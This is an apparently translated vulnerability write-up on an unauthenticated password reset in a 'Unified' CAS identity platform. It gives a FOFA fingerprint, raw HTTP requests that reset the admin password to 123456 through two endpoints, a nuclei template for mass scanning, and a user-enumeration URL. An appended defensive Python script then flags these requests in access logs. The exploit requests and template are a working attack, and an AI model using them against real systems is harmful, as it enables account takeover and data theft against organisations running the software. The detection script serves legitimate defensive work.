Arbitrary password reset in a widely deployed "Unified" (统一) identity platform

Preface

One day, while browsing WeChat official-account articles as usual, I came across a [vulnerability reproduction] post.


This is the same suite I hit back in 2021 or 2022; a quick analysis follows.

Unified: arbitrary password reset

Fingerprint: body="/cas/themes/zbvc/js/jquery.min.js"
The request is as follows:

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: 127.0.0.1
Content-Length: 46
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close

{"xgh":"admin","newPass":"123456","email":""}

PoC:

id: Cas-Fengsu-template-resetPasswordBySuper
info:
  name: 风速统一resetPasswordBySuper任意重置
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  metadata:
    fofa-query: body="/cas/themes/zbvc/js/jquery.min.js"
  tags: tags

http:
  - raw:
      - |
        POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 47
        Accept: application/json, text/plain, */*
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Application-Name: cas
        Content-Type: application/json;charset=UTF-8
        Connection: close

        {"xgh":"admin","newPass":"123456","email":""}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '密码修改成功'
      - type: status
        status:
          - 200

Verification demo:

Old endpoint, reset #2:

POST /cas/userCtl/resetPassword HTTP/1.1
Host: 127.0.0.1
Content-Length: 46
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Application-Name: cas
Content-Type: application/json;charset=UTF-8
Connection: close

{"xgh":"admin","newPass":"123456","email":""}

Verification

Where the reset function lives:
Unified user management platform: User Center
Request endpoint: cas/manager/user.html
Reset endpoint: cas/userCtl/resetPasswordBySuper
The latest Unified release has fixed the arbitrary reset endpoints above.
Unified sensitive information disclosure endpoint: cas/userCtl/getPage?name=&page=1&size=10 (both name and size are caller-controlled)
demo: /cas/userCtl/getPage?name=admin&page=1&size=10
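A defender-side check, added here as an example and not part of the original post: a small Python scanner that applies the indicators above (anonymous POSTs to the two reset endpoints, and getPage calls with an empty name filter or an oversized page) to web-server access-log lines. The log lines are constructed for the example. It assumes the reverse proxy in front of the CAS application records the authenticated user in the combined-log user field ("-" for anonymous clients); GETPAGE_MAX_SIZE is an assumed threshold to tune against real traffic.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the write-up above.
RESET_ENDPOINTS = {
    "/cas/userCtl/resetPasswordBySuper",
    "/cas/userCtl/resetPassword",
}
GETPAGE_ENDPOINT = "/cas/userCtl/getPage"
# Assumed threshold: the admin UI's own paging asks for 10 rows, so a much
# larger size is a bulk dump of the user table rather than normal browsing.
GETPAGE_MAX_SIZE = 50

# Combined log format (Apache/Nginx). The third field is the authenticated
# user as the front end sees it ("-" means anonymous). Assumption: the proxy
# in front of the CAS app fills it in for logged-in sessions; if it does not,
# the same rules must be applied to the application's own request log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: one anonymous client exercising every endpoint in the
# write-up, one legitimate admin reset from the user-management page, and
# one unrelated static-file request.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Jan/2024:10:00:01 +0800] "POST /cas/userCtl/resetPasswordBySuper HTTP/1.1" 200 58 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Jan/2024:10:00:02 +0800] "POST /cas/userCtl/resetPassword HTTP/1.1" 200 58 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Jan/2024:10:00:03 +0800] "GET /cas/userCtl/getPage?name=&page=1&size=10 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Jan/2024:10:00:04 +0800] "GET /cas/userCtl/getPage?name=admin&page=1&size=500 HTTP/1.1" 200 99120 "-" "Mozilla/5.0"
10.0.0.8 - opsadmin [02/Jan/2024:10:05:00 +0800] "POST /cas/userCtl/resetPasswordBySuper HTTP/1.1" 200 58 "https://sso.example.internal/cas/manager/user.html" "Mozilla/5.0"
10.0.0.9 - - [02/Jan/2024:10:06:00 +0800] "GET /cas/themes/zbvc/js/jquery.min.js HTTP/1.1" 200 87000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # keep_blank_values so that an empty name= filter is visible as "".
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Name the suspicious pattern an entry matches, or return None."""
    if entry["method"] == "POST" and entry["path"] in RESET_ENDPOINTS:
        # The reported bug: the reset endpoint accepts the request without a
        # logged-in session, so a reset from an anonymous client is the signal.
        # Attempts are flagged regardless of status, so probes against a
        # patched instance still show up.
        if entry["user"] == "-":
            return "unauthenticated_password_reset"
        return None
    if entry["path"] == GETPAGE_ENDPOINT:
        name = entry["query"].get("name", [""])[0]
        try:
            size = int(entry["query"].get("size", ["0"])[0])
        except ValueError:
            size = 0
        if name == "":
            return "user_enumeration_empty_filter"  # empty filter lists every account
        if size > GETPAGE_MAX_SIZE:
            return "user_enumeration_bulk"  # page size pushed far above the UI default
    return None


def scan(lines):
    """Return a list of (client_ip, alert_name, request_target) for flagged lines."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        alert = classify(entry)
        if alert:
            alerts.append((entry["ip"], alert, entry["target"]))
    return alerts


def summarize(alerts):
    """Count alerts per source IP so a single noisy client stands out."""
    return Counter(ip for ip, _, _ in alerts)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for ip, alert, target in found:
        print(f"{ip}\t{alert}\t{target}")
    print(summarize(found))
```

The legitimate admin reset from 10.0.0.8 is not flagged because the proxy attributed it to a logged-in user; every anonymous hit on the reset endpoints is, which is exactly the condition the bug depends on.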

Disclaimer: the content shared by this account is intended only for discussion of network security techniques and must not be used for illegal purposes. All penetration testing requires authorization; violators bear the consequences themselves, which have nothing to do with this account or its author. Please remember to abide by the law.
